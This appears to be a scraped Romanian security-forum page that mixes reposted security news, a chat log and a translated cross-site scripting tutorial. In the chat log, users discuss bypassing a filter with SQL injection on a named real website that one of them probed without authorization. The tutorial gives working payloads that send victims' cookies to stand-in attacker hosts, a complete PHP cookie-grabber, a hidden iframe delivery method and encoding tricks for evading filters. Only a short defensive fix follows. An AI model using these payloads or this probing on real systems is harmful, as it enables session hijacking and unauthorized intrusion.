Dragos

A man accused of being one of the most prolific sellers of credit-card data has been charged with participating in the brazen hack of RBS WorldPay in 2008 that funneled about $9.4m out of the payment processor in just 12 hours. Vladislav Anatolievich Horohorin, 27, was already in the custody of French police following his arrest three weeks ago on charges he sold huge “dumps” of stolen credit-card data. An alleged founder of CarderPlanet — a notorious clearinghouse for payment-card fraudsters — Horohorin has been awaiting extradition to the US. Prosecutors are wasting no time capitalizing on the capture of the high-profile suspect. Last week, they added Horohorin to the list of people accused of hacking into the computer system of Atlanta-based RBS WorldPay and retrieving payment card data as it was being processed. After raising the amount of funds available on the cards, the gang dispatched cashers in 280 cities worldwide to withdraw money from automatic teller machines, according to court papers. The charges were first made in an indictment filed in November. According to the superseding indictment, Horohorin was one of the cashers in the scheme. He was assigned a single payment card that he used at ATMs in Moscow to withdraw almost $126,000 on November 8, 2008. He is charged with one count each of wire fraud, and access device fraud. The court papers outline one of the more profitable hacking crimes in recent memory. Horohorin's inclusion brings to nine the number of people charged. Earlier this month, US authorities said three of the men believed to have orchestrated the attack were arrested in Russia. A PDF of the indictment is here. CarderPlanet founder charged in $9.4m RBS WorldPay hack ? The Register

Dansul ala se numeste tektonik..

Nu va satisfaceti curiozitatea sa intrati pe conturile alea ca sunteti blocati automat din db5. Conturile sunt facute pe anumite cartiere si anumite clase de IP-uri.

(06:24:54 PM) krisler12: salut (06:24:59 PM) Dragos: noroc (06:24:59 PM) Dragos: zi (06:25:06 PM) krisler12: te pricepi la sqli ? (06:25:10 PM) Dragos: dc? (06:25:19 PM) krisler12: vreau sa te intreb ceva (06:25:29 PM) krisler12: mai exact sa imi spui cum sa trec de un firewall (06:25:36 PM) krisler12: stii tehnici de atsea? (06:25:46 PM) Dragos: sa treci de firewall folosind sqli? (06:25:53 PM) krisler12: da (06:26:02 PM) krisler12: ca are firewall pe anumite cuvinte (06:26:08 PM) krisler12: si daca faci union (06:26:11 PM) krisler12: nu iti da voie (06:26:16 PM) krisler12: te pricepi ? (06:26:18 PM) Dragos: pula, ala se numeste FILTRU, nu firewall (06:26:30 PM) krisler12: unu mi-a zis ca firewall (06:26:35 PM) krisler12: in fine (06:26:38 PM) krisler12: te pricepi ? (06:26:40 PM) Dragos: da (06:26:45 PM) krisler12: ok (06:26:53 PM) krisler12: intra pe ancs.ro (06:26:58 PM) krisler12: si vezi ca e vulnerabil (06:27:20 PM) krisler12: ai intrat >? (06:27:34 PM) Dragos: are 2 coloane (06:27:42 PM) krisler12: asta am vazut si eu (06:27:43 PM) krisler12: ia zi (06:27:49 PM) krisler12: folosesti proxy ? (06:27:53 PM) Dragos: da (06:27:57 PM) krisler12: de care ? (06:28:05 PM) Dragos: adica? (06:28:11 PM) krisler12: de ala privat sau de asta de pe smair ? (06:28:19 PM) Dragos: d-ala privat (06:28:25 PM) krisler12: aha (06:28:40 PM) krisler12: dar daca nu folosesti poti sa patesti ceva ? (06:28:47 PM) krisler12: te intreb ca eu am incarcat fara (06:28:48 PM) krisler12: (06:28:52 PM) krisler12: (06:28:53 PM) Dragos: da (06:29:06 PM) krisler12: chiar si daca nu am facut nimica ? (06:29:27 PM) Dragos: daca li se scoala lor (06:29:27 PM) Dragos: da (06:29:37 PM) krisler12: ups (06:29:39 PM) krisler12: (06:29:45 PM) krisler12: tu ce zici oare sa am probleme ? (06:30:05 PM) Dragos: la cate tampenii scrii pe rst, nu (06:30:15 PM) krisler12: nu (06:30:31 PM) krisler12: ma refer la faptu ca am incercat sa le fac sqli la stiu astora (06:30:40 PM) krisler12: si am folosit si niste programe sa vad daca merge (06:30:40 PM) Dragos: fac referire la gandirea ta, nu o sa-ti faca nimic (06:30:47 PM) krisler12: de ce? (06:31:13 PM) Dragos: sa-mi bag pula, iar m-ai enervat (06:31:22 PM) krisler12: ce legatura are una cu alta? (06:31:30 PM) Dragos: DACA FACI DOAR SELECT, NU ITI FACE NIMIC (06:31:45 PM) krisler12: dar in ce caz iti face? (06:31:49 PM) Dragos: DACA LE MODIFICI DB-UL POT SA SUNE LA POLITIE (06:31:55 PM) krisler12: aaa (06:31:56 PM) krisler12: ok (06:32:03 PM) krisler12: mai esti pe situl ala ? (06:32:07 PM) Dragos: nu (06:32:10 PM) krisler12: ca vreau sa vezi ceva (06:32:20 PM) krisler12: intra iara ca sa iti arat o chestie interesanta (06:32:25 PM) Dragos: ce pula mea sa vad? (06:32:32 PM) krisler12: hai ca o sa vezi (06:32:36 PM) krisler12: intra un pic (06:32:40 PM) krisler12: ca doar nu's virusi (06:32:54 PM) krisler12: ai intrat ? (06:33:03 PM) Dragos: da (06:33:06 PM) krisler12: asa (06:33:07 PM) Dragos: uimeste-ma (06:33:11 PM) krisler12: ai zis ca sunt 2 coloane (06:33:23 PM) krisler12: ai vazut ca iti da si numele db (06:33:24 PM) krisler12: tot (06:33:26 PM) Dragos: da.. (06:33:31 PM) krisler12: ei (06:33:39 PM) Dragos: e de kkt (06:33:41 PM) krisler12: cum faci union all sellect pe situl asta ? (06:33:51 PM) krisler12: ca mie nu imi merge ? (06:34:00 PM) Dragos: sa-mi bag pula, postez conversatia pe rst later... (06:38:36 PM) krisler12: scoate ba de pe rst (06:38:58 PM) krisler12: macar modifica numele sitului9 ca poate se gaseste vreun tampit sa il hackuiasca (06:39:12 PM) Dragos: lol.. (06:39:17 PM) Dragos: nu ma doare (06:39:25 PM) Dragos: daca gaseste asta e (06:39:40 PM) krisler12: hai ba te rog ca e ip-ul meu pe acolo (06:39:55 PM) Dragos: ce ip? (06:40:07 PM) krisler12: pai nu ti-am zis ca am intrat fara proxy (06:40:19 PM) krisler12: si daca cumva se gaseste vreunu or sa creada ca am fost eu

Chestii de genul faceam prin 2004-2005. Man, grow up!

Sony has won a temporary ban to prevent Australian distributors selling a hardware hack for the PlayStation 3 (PS3). The PS3Jailbreak "dongle" allows gamers to play homemade and pirated games on the game's console. The ban prevents OzModChips, Mod Supplier and Quantronics from importing, distributing or selling the device. Sony has until August 31 to makes its case to the court for a permanent ban. If it fails, the chips could go on sale on 1 September. The firm declined to comment on the proceedings. The Australian distributors could not be reached. The court order also gives Sony control of all of the dongles in the firms' possession and allows the electronics giant to test the devices - including "destructive analysis" - to see how they work. Homebrew games PS3Jailbreak is a dongle containing software that allows users to save games to the console's hard drive. It is the first product to crack the security on the PS3. It was met with scepticism when videos of the device - posted by OzModChips - first appeared online in early August. At the time, a spokesperson for Console Pro, another distributor based in the Netherlands, told BBC News the "dongle converts a retail unit into a dev unit". Dev units are used by developers to test code for the machine. "Dev mode means it will run any - even unsigned - code," said the spokesperson. "Using a simple backup maker or player software, you can play backed-up [saved] games without the actual disc being in the PS3." The legality of these products - commonly called modchips - differs by country. In Australia they are legal, whilst in the UK a recent court case brought by Nintendo said that "game copiers" were illegal to import, advertise or sell. Proponents of modchips say they are the only way to play homemade games, known as "homebrews". It is not known whether distributors in other countries have been served similar notices. But, a spokesperson for Console Pro told BBC News in the wake of Friday's ban that the firm had "not heard anything from Sony or any lawyer or court yet". "I really doubt Sony has grounds to ban this dongle." BBC News - Sony obtains Australia ban on PS3 hack chip

Data loss prevention (DLP) is an emerging field with a lot of different products and players. The idea is to stop information from leaving your internal networks in close to real time, so you can identify the leaker or thief before too much damage (and ensuring lawsuits) happen. A recent study by DLP vendor Proofpoint found that more than third of the respondents had an incident in the last year, and a quarter of them had investigated leaked information as a result of a blog post. There are more than a dozen different DLP vendors. We show you three typical products, how they work, and what kinds of information they track. * Global Velocity's GV-2010 security appliance, * BlueCoat Networks DLP appliance, and * Sendmail's Sentrion email server. Each is designed for somewhat different situations, which is why we have collected them together. Before you dive into these products, you might want to address the following questions: * Who will own the DLP process in your organization: Will it be the general IT staff, the infrastructure management group, the desktop security group, or some other combination? Depending on this ownership might compel a particular collection of DLP products. * Where does DLP presently touch your existing IT security infrastructure? Most firewalls and email servers have some DLP capabilities; the tricky part is being consistent across your enterprise and getting a specialized DLP product that can complement and in some cases work with these legacy devices. * Are you looking at total DLP protection, for endpoints, data in motion and file server data? No single product can handle all of these situations; so how each vendor partners and integrates with others for complete coverage is critical. * Do you want something to decrypt emails and https traffic? Not all products can see inside these protocols without some additional work. All three products have the ability to scan for particular character strings (like a Social Security or credit card pattern) and also upload sensitive documents into their protective scanning engines to ensure that this specific unstructured information is also protected. Another typical situation is where a rogue employee will send a customer database list to their personal Gmail or Yahoo mail account, and then downloads or forwards this information once they get home. Each product has a variety of reports to show you incidents flagged by the protective policies and what information was leaked. How to prevent data from leaving your network | ITworld

33171 - 33000 = 171

The developers of the uTorrent file-sharing application have released an updated version that fixes a problem that could allow an attacker to load malicious code onto a user's computer. The problem, known as DLL (dynamic link library) load hijacking, affects dozens of commonly used Windows applications. The flaw can allow an attacker to trick an application into downloading what it thinks is a DLL but actually is a malicious file. A DLL is a piece of code that can be used by more than one application. The issue affects more than 40 applications including the Safari and Firefox browsers, many Microsoft and Adobe Systems applications and others including Skype and uTorrent. UTorrent version 2.0.4 fixes the problem, although the company behind the application, BitTorrent, said that no attacks have been reported despite a working exploit. "The new client disables loading of DLLs from the current working directory and prevents this exploit from functioning," according to the posting. "We take our users' security very seriously, and we sincerely apologize for any inconvenience." The DLL problem isn't specific to the Windows OS, and Microsoft can't issue a patch that makes all of the applications safe. Application developers and companies need to develop their own specific patches. UTorrent is a free BitTorrent client application that manages the downloading of content from the peer-to-peer system, which uses small information files called torrent to coordinate downloads. uTorrent patches application against DLL vulnerability | ITworld

A government training organisation - the National Skills Academy - has had its home page hacked and replaced by a message supporting Palestine. Much of the rest of the site is still working but the front page has been replaced with a picture of a container ship with Gaza on the side and a gloating message from hacker JaCKal. It says: "Virtual Protests will continue..! Everything for PALESTINE! JaCKal Ownz Your System. I came challengeing to the world THE END." The National Skills Academies, according to the bit of its website which hasn't been hacked, are "employer-led centres of training excellence". They're split into 14 different areas including construction, financial services and creative and cultural skills - these bits seem to have kept JaCKal out. A spokeswoman for the National Skills Academy told us their techies were in the process of taking the website down. She did not when the hack happened or how it had happened. Pro-Palestine hackers spraypaint gov training quango ? The Register

Ba omule, am tradus tutorialul in engleza. Tutorialul original cu PDF il gasesti la sectiunea Tutoriale in romana.

About Cross Site Scripting Author: Synthesis Website: www.rstcenter.com 1. Introduction This article is dedicated to a web vulnerability called Cross Site Scripting. The examples throughout the article are created in Cascading Style Sheet (CSS), HyperText Markup Language (HTML), Hypertext Preprocessor (PHP), JavaScript (JS) and Visual Basic Script (VBScript). 2. Definition Cross Site Scripting (abbreviated XSS) is a Web vulnerability that allows the user to enter a personal script into a webpage. This script may affect other users that are seeing the infected page (client-side vulnerability). This vulnerability is dangerous only when the code affects cookies or sessions. 2.1 About cookies A cookie is a piece of text, often encrypted, sent by a server to a web browser. This web browser receives the cookie and sends it back unchanged whenever the user accesses that server. Overall, a cookie can be viewed as a key to log on that server. Cookies are usually created after the user has logged on a site. After stealing a cookie from the victim, the attacker can use it to authenticate on the site with the victim's identity. The cookies can be reached easily using JavaScript. A cookie grabber is mostly used to capture cookies. The cookie grabber is a script that receives the victims's cookies through GET and stores them in a database. 2.2 Types of XSS There are two types of XSS. 2.2.1 Non-persistent XSS The non-persistent XSS (also known as reflected or temporary XSS) is an XSS that affects the user only if he accesses the infected site. This type of XSS is the most common. Let's take as an example a site's search engine. In some cases, when it doesn't find what the user requested, it displays a message like <?php echo $_GET['q']; ?> was not found. Because the search engine displays the information requested by the user unfiltered, we can enter various codes tot infect the page. 2.2.2 Persistent XSS The persistent/stored/permanent XSS is an XSS which is stored by the site. This type of XSS is the most dangerous because the script is entered once and it affects the other users as long as the script remains on the page. Most often, we find persistent XSS in the sites that offer the latest searches. 3. How does an XSS occur? An XSS occurs when the code is not filtered (or filtered wrong). Most times, the page is reading a variable through GET, then displays its value in a web browser. There are also XSS via POST, but is slightly more difficult to exploit. 4. Exploiting an XSS through GET Let's consider the following code: <form action="" method="GET"> <input type="text" value="" name="text"> <input type="submit" value="Search"> </form> <?php echo stripslashes($_GET['text']); ?> The code above is a form with a box and a button. After you write something in the input box and click the Search button, the form sends the information to a PHP code that takes it as yourpage.php?text=InformationFromForm and displays it. How can we exploit this form? 4.1 Inserting a JavaScript code in the form JavaScript is an object-oriented programming language. It is used to introduce different features in a web page. JavaScript has the advantage that it can run on your computer, without requiring an Internet connection. In the form above, we can insert any JavaScript code. This script will be executed as soon as we hit the Search button. For example, if we insert the code below into the form, the web browser will display an alertbox with the text Message. <script language="JavaScript">alert("Message")</script> 4.1.1 Cookie grabber As I said earlier, a cookie can be stolen using a cookie grabber. In order to steal a cookie, the attacker must create a redirect to his cookie grabber. In this case we can use document.location: <script language="JavaScript">document.location="http://www.site.com/cookiegrabber/index.php?victimcookie="+document.cookie;</script> Now, how does a cookie grabber work? Easy! The PHP code takes the information using GET (in the example above victimcookie) and saves it in a database. A cookie grabber example for the code above: <?php /* Cookie Grabber Example */ // MySQL database connection $host = 'localhost'; $name = 'root'; $password = 'password'; $database = 'database1'; // Connecting to the database $connect = mysql_connect($host, $name, $password) or die(mysql_error()); mysql_select_db($database) or die(mysql_error()); // Taking the cookie using GET $cookie = $_GET['victimcookie']; // Victim's referer $referer = $HTTP_REFERER; // Conditional statements if ($cookie == "") { header( 'Location: http://www.google.com/' ); // If the user accesses the page and GET is empty, we will be redirected to Google }else{ mysql_query("INSERT INTO Cookies (Cookie, Link) VALUES ('$cookie','$referer')"); // We insert the cookie and the referer into the database mysql_close($connect); // We close the connection to the database header( 'Location: http://www.google.com/' ); // We redirect the user to Google } ?> There is a chance for the victim to notice that the link is not completely OK, so he may not enter the link. But no problem! We can use an iframe: <iframe scr="http://site.com/script.php?text=<script>document.location.href='ht tp://server2.com/grabber.php?cookie='+escape(document.cookie)</script>" width="0" height="0"> 4.2 Inserting a VBScript code in the form VBScript is a programming language created by Microsoft, which underlies the ASP programming language. VBScript is executed only on Internet Explorer browser. To display the same alertbox as above we write the following code in the form and click the Search button: <script language="VBScript">MsgBox "Message"</script> 4.3 Inserting a CSS code in the form CSS is used for formatting HTML documents. We have the CSS code below to display the alertbox with the text Message (as above). <style type="text/css">body{background-image: url('javascript:alert("Message");');}</style> XSS using CSS is old and works only on older browsers such as Internet Explorer 6. 4.4 Ways to encode your personal script There are several ways to encrypt your personal script to place it in a vulnerable form. I'll show you below three known methods. 4.4.1 Hexadecimal Hexadecimal is a positional numeral system with a radix, or base, of 16. It uses sixteen distinct symbols, most often the symbols 0–9 to represent values zero to nine, and A, B, C, D, E, F (or alternatively a through f) to represent values ten to fifteen. Sometimes, when inserting an information into a form (search form, logging form, etc..), the script checks if the information submitted contains certain strings such as "<script>", "alert", "document.location", "window.location " or others. We can replace these strings with their value in hex system. The PHP function below converts any string in hexadecimal system. <?php function code_hex($sir) { $hex=''; for ($i=0; $i < strlen($sir); $i++) { $hex .= dechex(ord($sir[$i])); } return $hex; } ?> 4.4.2 Unicode Unicode is an encoding format for storage and interpretation of texts on media information. It is used for encoding JavaScript scripts. We have below a JavaScript function that converts the script to Unicode using charCodeAt. <script type="JavaScript"> function encode_Unicode(string) { if (string == "") { alert('The string can not be NULL.') } else { syn = "String.fromCharCode(" for (i=0;i<string.length;i++) { inceput+=string.charCodeAt(i)+"," } syn = syn.substring(0,syn.length-1) syn += ")" return syn; } } </script> 4.4.3 Double Encoding This method consists of double encoding the personal code in order to bypass security filters or to execute certain commands. We can bypass the security filters due to the server that decodes the information once. The second part of decoding is done by the backend platforms or modules which usually have no security checks. This technique is not used only to XSS, but also at other types of web attacks such as LFI and RFI. Let's consider the following JavaScript code: <script>alert("Message")</script> First, we convert the HTML chars to hex. %3Cscript%3Ealert%28%22Message%22%29%3C%2Fscript%3E The sign for double encoding is %. In hexadecimal system it is represented by %25. So we add %25 at every HTML char. The code will be: %253Cscript%253Ealert%2528%2522Message%2522%2529%253C%252Fscript%253E 4.5 Other ways to exploit an XSS There are many methods for exploiting an XSS.. 4.5.1 XSS using IMG tag <IMG SRC=javascript:alert("Message");> <IMG SRC=vbscript:msgbox("Message");> 4.5.2 XSS imported from another site <SCRIPT SRC=http://www.site.com/xss.js></SCRIPT> The file xss.js contains: alert ("Message"); 4.5.3 Malformed HTML tags <IMG src="""><SCRIPT>alert("Message")<%2FSCRIPT>"> 5. Methods to protect ourselves from XSS XSS can be easily repaired. PHP provides two functions that do the same thing: htmlentities and htmlspecialchars. These functions convert special characters like "<", ">", "&" and quotes in HTML entities. So, the browser will return the text, but won't execute the personal code. Let's add one of this functions to the form above: <form action="" method="GET"> <input type="text" value="" name="text"> <input type="submit" value="Search"> </form> <?php echo htmlentities((stripslashes($_GET['text'])), ENT_QUOTES); ?> 6. Ending In this article we talked about what is an XSS, how many types of XSS are there, how can we exploit an XSS and how can we protect ourselves from XSS. If you have questions, send me an email to the address listed at the beginning.

Google is taking on internet telephone companies like Skype by allowing users to call from its free web-based email service. The service allows users to make calls to land lines and mobiles from inside their Gmail account. Phoning anywhere in the US and Canada will be free until the end of the year, while calls to the UK, France, China and Germany will cost 2 cents a minute. Until now Google offered computer-to-computer voice and video chat services. "This is a real big deal because now hundreds of millions of Gmail users can make phone calls right from their Gmail page," Craig Walker, product manager for real-time communications told BBC News. "They don't need to download an additional application or anything to start making really high-quality low-cost calls. For the user it means much more efficient and low-cost communications." The product will initially be rolled out in the US, the firm said. However, for a brief time, international users were also able to use the feature because of an error. "Unintentionally we briefly made the service available to non-US English users," a spokesperson said. "We do hope to bring it to our international users soon" When it rolls out the product link will appear on the left hand of the Gmail page within the "chat" window. A "call phone" option will pop up along with a number pad to let you dial the number of the person you want to talk to. Google said money raised from international calls will pay for the free US and Canadian calls. "What surprised me was that they actually said they hope to make money off the calls," said Danny Sullivan, editor-in-chief of technology blog SearchEngineLand. "Normally Google is like 'We don't know how we are going to make the money' or 'We will make money down the way, don't worry about it' and this stands out as a big benefit that they get actual revenue early on." Competition Skype, which is the most successful internet phone offering, claims to have over 560 million registered users. The firm said 124 million used the service at least one a month while 8.1 million were paying customers. The company is planning to offer shares to the public later this year. Observers said that it is too early to say whether companies like Skype should be worried. "Skype is a well known company in this place and they are almost like a verb in the internet calling world in the way Google is with search. You Skype someone. So I think there is some inertia there to get over and I am interested to see how Gmail users respond," said Tom Krazit, senior writer with technology news site CNET.com. "But you always have to worry when Google comes after what you do. They don't do things half way and bring a lot of resources to any problem they try to tackle. It doesn't mean you are doomed. "Google's product won't work on your mobile browser so Skype has an advantage there but I don't think it is a stretch to assume Google will come out with a mobile version pretty soon," said Mr Krazit. The company plans an eye catching way to get non-Gmail users to give the product a go. It is in negotiations with a number of university campuses and airports to install red telephone boxes around the country to give users the chance to dial and try. BBC News - Google offers free voice calls via Gmail

Visa on Tuesday announced a set of security best practices for vendors of payment applications and for the systems integrators and resellers responsible for implementing and managing them. The guidelines are designed to address continuing vulnerabilities in the payment chain stemming from insecure implementations of the applications that are used in credit and debit card transactions, according to Eduardo Perez, Visa's head of global payment system security. The existing Payment Application Data Security Standard (PA-DSS) administered by the PCI Security Council, already requires developers of payment applications to implement specific security controls in their software. For instance, the standard requires application vendors and developers to ensure their applications do not store prohibited cardholder and authentication data. However, while the software itself may be secure, several vulnerabilities continue to persist because of improper configurations and other implementation errors, Perez said. Visa's best practices are a natural extension to the PA-DSS requirements, Perez said. "What we have done is to go a bit beyond these requirements. PA-DSS is about secure payment applications and not about their secure implementation and management." Visa's guidelines were developed in collaboration with the SANS Institute, a Bethesda, Md.-based security training and certification organization. The best practices touch upon 10 different issues and include a mix of technology and process-related advice. For instance, the best practices urge developers and systems integrators to conduct application vulnerability detection tests and code reviews for detecting common vulnerabilities. It also urges them to adhere to secure software development practices and to actively work at identifying and decommissioning payment applications that store PIN and other prohibited payment card data. Visa's guidelines are part of a continuing effort by the company to get stakeholders within the payment industry to adopt some fairly fundamental security standards for protecting cardholder data. Tuesday's best practices for instance, are similar to guidance the company has released previously on tokenization and encryption. The company has also been the most vigorous proponent of the PCI data security standard and is believed to be the most aggressive at enforcing compliance with the standard. In the past, several of Visa's best practices and guidelines have ended up being drafted into formal payment industry standard. Even the PA-DSS itself for instance, was originally proposed by Visa as a set of best practices, but eventually became a formal PCI standard . Jaikumar Vijayan covers data security and privacy issues, financial services security and e-voting for Computerworld. Follow Jaikumar on Twitter at @jaivijayan , or subscribe to Jaikumar's RSS feed . His e-mail address is jvijayan@computerworld.com . Visa offers new guidance on securing payment applications | ITworld

Facebook and Twitter users are complaining about their accounts being compromised and then being used to spam friends with suspicious "free iPad offers." Twitterwarned users of the scam, Wednesday, saying that it was resetting passwords of affected users. "If you've received a message promising you a new iPad, not only is there no iPad, but also your friends have been hacked," Twitter said The scam is also hitting Facebook users to, according to company spokesman Simon Axten. "It's affecting an extremely small percentage of people on Facebook, but we take all threats seriously," he said via e-mail. Gerome Stevens discovered that his Twitter account had been used to direct message contacts late Wednesday. He's not sure how the scammers got into his account, but they sent direct messages to his friends, that said, "u have to check out this website its glitchin right now and sending out ipads to everyone for free!" He said the messages continued, even after he'd changed his password. The messages his friends received contained a link to better-gifts.net. That Web site asks for personal information, and then directs the user to a variety of promotional offers from legitimate companies such as Netfilx, the Doubleday Book Club, and Columbia House DVD. Online marketing programs pay cash for Web traffic, and hackers have found that by phishing victims and then using that information to break into legitimate Twitter and Facebook accounts, they can earn money. This type of spam is particularly effective, because the messages appear to come from a trusted source. Scammers hit Twitter, Facebook, send free iPad spam | ITworld

Trei adolescenti din Columbia au fost ucisi la 5 zile dupa ce numele lor au aparut pe o "lista neagra" postata pe Facebook. Diego Ferney Jaramillo, in varsta de 16 ani si Eibart Alejandro Ruiz Munoz, in varsta de 17 ani, au fost impuscati mortal pe 15 august, in timp ce se plimbau cu motocicletele pe una din arterele orasului Puerto Asis. Doua zile mai tarziu, tinerii din oras au primit prin Facebook o lista continand 69 de nume, inclusiv cele ale tinerilor ucisi. Adolescentii erau sfatuiti sa paraseasca orasul, altminteri vor muri. Pe 20 august, Norbey Alexander Vargas, in varsta de 19 ani, al treilea adolescent al carui nume se afla pe lista, a fost si el impuscat. Initial, politia din Columbia a considerat “lista neagra” o gluma macabra intre adolescenti, dar in clipa in care au mai fost adaugate inca 31 de nume, parintii au intrat in panica, iar autoritatile au demarat o investigatie. Ulterior, amenintarile au fost extinse sub forma unor fluturasi lasati pe parbrizele autoturismelor familiilor in cauza, pe care era scris: "Ca si rude ale acestora, va rugam sa le cereti sa paraseasca orasul in mai putin de trei zile, sau vom fi nevoiti sa facem noi acte precum cele de la 15 august." Parintii adolescentilor vizati si-au luat copii si au fugit din oras. Potrivit autoritatilor, in spatele asasinatelor s-ar putea afla una dintre cele doua organizatii criminale din oras: Los Rastrojos si Fortele Revolutionare Armate din Columbia (FARC). Trei adolescenti ucisi dupa ce au aparut pe o ?lista neagra? pe Facebook | Hit.ro

Security company AVG has released the results of an interesting study showing the risk of stumbling unto a malicious website around the world. The results show that the risk varies wildly from country to country. The riskiest place to surf the web is Turkey where one in ten AVG users was faced with a potentially malicious website during the last week of July, when the study was conducted. At the other end of the scale, just one in 696 users in Sierra Leone was under threat. The great disparity is interesting, but it can be traced back to several factors. First and foremost, the research doesn't necessarily show the place where it's safest to use the Internet, it's more telling of user behavior than anything. The great differences between countries can also be attributed to internet use in each region. Africa has seven countries in the top ten safest places in the study, but it also has one of the lowest penetration rates on the planet. With electricity still unavailable to many on the continent, the internet is a luxury enjoy by a few. At the same time, Japan is the third safest country, with one in 403 users encountering an attack. Japan is one of the most connected countries on the planet so adoption is not an issue here. In fact, it may very well be that the wide reach helps in this regard, users in Japan are generally more tech savvy. Users in Russia have more to worry about though. With one in 15 users facing an attack, it's the second riskiest country after Turkey. By continent, North America fares the worst, with one in 51 users at risk of an attack. South America is the safest with the attack rate being one in 164. AVG looked at data from 127 million computers with its software installed from 144 countries, so it's safe to say that the study had a representative sample. Turkey and Russia Are the Riskiest Places to Go Online - Softpedia

Adobe has issued a security update to its Shockwave Player which patches quite a few critical vulnerabilities. Many of the vulnerabilities could have allowed attackers to execute arbitrary code on the target machine. Adobe Shockwave Player 11.5.8.612 closes 18 critical vulnerabilities. All previous versions of Shockwave are affected by the issues. In total, 20 security holes were plugged with the update. "Critical vulnerabilities have been identified in Adobe Shockwave Player 11.5.7.609 and earlier versions on the Windows and Macintosh operating systems," Adobe announced. "The vulnerabilities could allow an attacker, who successfully exploits these vulnerabilities, to run malicious code on the affected system. Adobe recommends users of Adobe Shockwave Player 11.5.7.609 and earlier versions update to Adobe Shockwave Player 11.5.8.612," the advisory continued. 16 of the issues were memory corruption vulnerabilities all of which could have been exploited to run malicious code. A pointer offset vulnerability and integer overflow vulnerability which would also have enabled attackers to run code was patched. Adobe credits the discovery of the vulnerabilities to independent researches, groups and security companies. Rodrigo Rubira Branco of Check Point is credited for six critical vulnerabilities. Several researchers, including anonymous ones, used the TippingPoint's Zero Day Initiative to uncover the vulnerabilities. The Adobe Shockwave Player enables users to run Adobe Director application embedded on web pages. While not as popular as Adobe Flash Player, which is present on almost all of the computers in the world, at least, those with access to an internet connection, Shockwave Player is still one of the most popular apps on the planet with over half of computers, or more than 450 million, having it installed. Adobe Shockwave Player 11.5.8.612 Plugs 18 Critical Holes - Softpedia

Apple has purged Mac OS X of a browse-and-get-hacked vulnerability that first came to light three weeks ago, when the popular Jailbreakme service used it to root fully patched versions of the iPhone. The buffer overflow flaw in an OS component that parses fonts was one of 13 vulnerabilities Apple fixed in an update released on Tuesday. It allowed attackers to remotely execute malicious code on vulnerable machines simply by getting the user to view a booby-trapped PDF document. A related bug was patched two weeks ago in iOS, which powers the iPhone, the iPad and the iPod Touch. The vulnerability in the latter devices was being actively exploited by Jailbreakme, allowing users to jailbreak their device by doing nothing more than visiting the site and flicking a slider. There were no reports of the vulnerability being exploited in OS X. Tuesday's update also patched a hole in CFNetwork that allowed attackers to bypass secure sockets layer protection, and it fixed a variety of third-party components including ClamAV, Samba and PHP. The fixes came the same day that Adobe patched 20 holes in its widely used Shockwave Player. Apple kills Jailbreakme Mac bug ? The Register

Wikileaks posted a classified CIA memo on Wednesday, three weeks after the Pentagon warned the self-described whistleblower website to return a huge cache of of unpublished documents believed to be in its possession. The secret memo, titled “What If Foreigners See the United States as an 'Exporter of Terrorism?',” isn't likely to cause US intelligence officials to lose much sleep. It was drafted six months ago by members of the CIA's “Red Cell,” a unit established to offer agents food-for-thought on a host of issues. “These sorts of analytic products – clearly identified as coming from the Agency's 'Red Cell' – are designed to simply provoke thought and present different points of view,” the CIA said in a statement issued on Wednesday. Still, the release indicates that Wikileaks remains undaunted by veiled Pentagon threats following last month's airing of some 77,000 mostly classified records related to the US war in Afghanistan. Wikileaks founder Julian Assange said two weeks ago he would not be intimidated into suppressing an additional 15,000 documents he is still holding. He has said he's weeks away from releasing the documents, which some pundits have warned could be even more explosive than the first batch. The latest Wikileak also came on the same day that prosecutors in Sweden cleared Assange of sex-abuse charges, according to the Associated Press. He is still under investigation for “molestation,” an offense that's not considered a sex crime in that country, “a wide range of offenses, including reckless conduct or inappropriate physical contact with another adult, and can result in fines or up to one year in prison,” the AP said. The charges were based on the accounts of two women who said consensual sex they had with Assange that later turned non-consensual when he refused to use a condom The Guardian reported Tuesday. The three-page memo published Wednesday warns that the US could lose influence with allies it counts on to hunt out terrorists if its citizens based abroad are viewed as potential threats. “If the US were seen as an exporter of terrorism, foreign partners may be less willing to cooperate with the United States on extrajudicial activities, including detention, transfer, and interrogation of suspects in third party countries,” the memo, dated February 2, stated. Wikileaks publishes secret CIA memo ? The Register

The Pentagon has opened the kimono on what it described as the “most significant breach of US military computers ever,” in which a flash drive in 2008 was used to infect large numbers of computers, including those used by the Central Command overseeing combat zones in Iraq and Afghanistan. When the device was plugged into a military laptop located on an undisclosed base in the Middle East, malicious code soon linked highly sensitive machines to networks controlled by an unnamed foreign intelligence agency, Deputy Defense Secretary William J. Lynn III wrote in the first official account of the episode. “That code spread undetected on both classified and unclassified systems, establishing what amounted to a digital beachhead, from which data could be transferred to servers under foreign control,” he wrote in an article to be published Wednesday, according to The Washington Post. “It was a network administrator's worst fear: a rogue program operating silently, poised to deliver operational plans into the hands of an unknown adversary.” Military officials responded with a counter attack known as Operation Buckshot Yankee, which Lynn characterized as a turning point in the Pentagon's computer defense strategy. Among the steps initially taken was the banning of USB devices by the Defense Department, a curb that has since been modified slightly. The account, included in the latest issue of Foreign Affairs, comes almost two years after The Los Angeles Times reported an unofficial account of the incident, that claimed it most likely originated in Russia. Wednesday's article signals attempts by the Pentagon to raise awareness to the growing vulnerability of the US military to computer-based attacks, which often allow adversaries with modest means to inflict disproportionate damage. “A dozen determined computer programmers can, if they find a vulnerability to exploit, threaten the United States's global logistics network, steal its operational plans, blind its intelligence capabilities or hinder its ability to deliver weapons on target,” Lynn wrote. Last month, a retired US general made many of the same points, comparing the network world to the highly vulnerable North German plain that has been invaded repeatedly over the past several centuries. More coverage from The New York Times is here. Wired.com has an article here saying some Defense Department insiders doubt the attack was the work of a hostile government. Pentagon confirms attack breached classified network ? The Register

The Home Office has said that new UK passports with 'strengthened security features' will be issued from October. To make the passports more secure, the chip which stores the holder's details has been moved to the inside of the passport cover so it will no longer be visible, the Home Office said. The new 10-year passport will also have a transparent covering which will display several holograms to protect the holder's personal details, and a secondary image of the holder printed onto the observations page. "Through its combination of physical and electronic security features, the UK passport remains one of the most secure and trusted documents in the world, meeting rigorous international standards," said Sarah Rapson, chief executive of the Identity and Passport Service. "The new design is part of our strategy to stay ahead of criminals who look to fraudulently alter or copy passports." Other new security features include images of well known UK scenes that will be created through special printing techniques, "which will give UK citizens added protection from identity theft and fraud and ensure speedier travel across borders". As part of the redesign, the personal details page of the passport will be moved to the second page in the passport booklet. The Home Office hopes that this will help speed up travellers' passage through border controls. The new passport will replace the current UK ePassport, which was upgraded in 2006 with the addition 